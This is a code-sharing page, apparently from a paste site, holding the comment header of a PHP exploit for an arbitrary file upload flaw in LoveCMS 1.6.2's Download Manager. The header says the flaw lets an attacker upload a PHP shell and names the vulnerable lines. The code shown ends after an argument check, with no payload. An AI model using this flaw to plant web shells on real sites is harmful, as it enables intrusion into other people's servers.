/ Published in: PHP
Expand |
Embed | Plain Text
Copy this code and paste it in your HTML
<?php /** * LoveCMS 1.6.2 Final (Download Manager v1.0) Arbitrary File Upload Exploit * Discovered && Exploited by cOndemned * * Download: * http://www.thethinkingman.net/modules/download_manager/?id=16 * * Description: * This exploit allows attacker to upload any type of file [no extension * filtration] ex. php shell... * * Uploader is adding random number on the begining of file name so user * have to check it manually. * * for more information check /modules/download_manager/admin/index.php * lines 10 - 27. * * Greetz: * ZaBeaTy, str0ke, Necro, doctor, sid.psycho, 0in, TBH & Avantura... * */ if($argc != 3) { exit; } ?>